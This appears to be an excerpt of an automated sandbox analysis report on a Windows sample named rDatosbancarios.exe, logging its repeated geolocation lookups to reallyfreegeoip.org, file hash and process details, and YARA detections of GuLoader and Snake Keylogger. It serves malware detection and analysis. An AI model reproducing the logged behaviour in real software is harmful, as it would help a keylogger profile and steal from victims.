                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHG6Tid4FKJqiqBVUuFBuL7HbH69VtwScfw8jZeH7jApUfpTu%2BicSJWxeRU0c%2BhtOxrlt6fLWzMnWNO7tDDepKTWTopfXHITGaobe03YwJQkB5DJk%2F%2BE0c94kIbbspvLK2jFj07k"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e930cc4f3361ce-ORD
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=19821&min_rtt=17716&rtt_var=8665&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=106631&cwnd=207&unsent_bytes=0&cid=bd3d4556882cb3b7&ts=613&x=0"
                                                                            2025-03-11 07:03:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549721104.21.96.14437148C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-11 07:03:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2025-03-11 07:03:17 UTC853INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 07:03:16 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 85069
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GRJsuXYM6p6TCop5DPdua0WxFYVRk1PhAzGJEwXHYI5B6lTPyfSDW3zxsPUegVbtvUeg27mEFNwptGjybQhMazhmtfrnXgPdAOKkOe8HV7FoT5J3Oi0U1y2%2BUgesQPftrvotC0V%2B"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e930eb1ebc607b-ORD
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18260&min_rtt=18000&rtt_var=5522&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=150715&cwnd=244&unsent_bytes=0&cid=65af2d7d325f299e&ts=608&x=0"
                                                                            2025-03-11 07:03:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.549723104.21.96.14437148C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-11 07:03:19 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2025-03-11 07:03:20 UTC863INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 07:03:19 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Cf-Ray: 91e930fdbe732a24-ORD
                                                                            Server: cloudflare
                                                                            Age: 85072
                                                                            Cache-Control: max-age=31536000
                                                                            Cf-Cache-Status: HIT
                                                                            Last-Modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xDhh0Jlj4fN8I4bvXspcXKJhIg58EcT%2Fr94jOcz7ClxUG8yCS0w%2BMGoHGhWn%2FbDYQgBsrgKg%2BCi1pPYWpeUtOYPAqOljNdVV9TYq%2F4C%2BCXdJG8ghTTtJElaoOQ%2BgZx2PJjP5ZQQK"}],"group":"cf-nel","max_age":604800}
                                                                            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18581&min_rtt=17225&rtt_var=7197&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=125809&cwnd=251&unsent_bytes=0&cid=10d12353913eadc7&ts=619&x=0"
                                                                            2025-03-11 07:03:20 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.549725104.21.96.14437148C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-11 07:03:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2025-03-11 07:03:24 UTC857INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 07:03:24 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 85077
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cwYd6XNw0Nd02%2BRl2hH2%2B71jp8Up%2FR1TxYedj8RD7iBICl2VQo4zov%2FdRSiCuZisUAI0kZvKvHvkKL4ii1xsieH4q2tx4Oxb6el4MERyWZ8qC7z42gRfxxdr8U5Ge5PwpYfzQB3I"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e9311baed8231d-ORD
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=21504&min_rtt=20198&rtt_var=7971&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=110855&cwnd=245&unsent_bytes=0&cid=abdca1ae613c4597&ts=606&x=0"
                                                                            2025-03-11 07:03:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.549727104.21.96.14437148C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-11 07:03:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2025-03-11 07:03:30 UTC860INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 07:03:29 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 85082
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 07:25:27 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQeIJxe5FQdZ7z2gKv3%2FvHw7%2FpB6LPNKvm0oSea6yQU2Yc20%2BmxvfbyA1WKusXr4Tym7fSyQwOsDhoQg5uV0y1i2K%2FnsRCKKbCRGqhCBpvQswvH%2B4vAOPMFLfX7fTUoNNOvRvxil"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e9313bfb6c2a24-ORD
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=20367&min_rtt=18942&rtt_var=7938&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=107295&cwnd=251&unsent_bytes=0&cid=5464839b33c08ddb&ts=2963&x=0"
                                                                            2025-03-11 07:03:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:03:01:21
                                                                            Start date:11/03/2025
                                                                            Path:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\rDatosbancarios.exe"
                                                                            Imagebase:0x400000
                                                                            File size:890'069 bytes
                                                                            MD5 hash:AD465ED89A2C85DE228C1ECA00AD3C21
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2166291651.0000000004666000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:6
                                                                            Start time:03:02:45
                                                                            Start date:11/03/2025
                                                                            Path:C:\Users\user\Desktop\rDatosbancarios.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\rDatosbancarios.exe"
                                                                            Imagebase:0x400000
                                                                            File size:890'069 bytes
                                                                            MD5 hash:AD465ED89A2C85DE228C1ECA00AD3C21
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Reset < >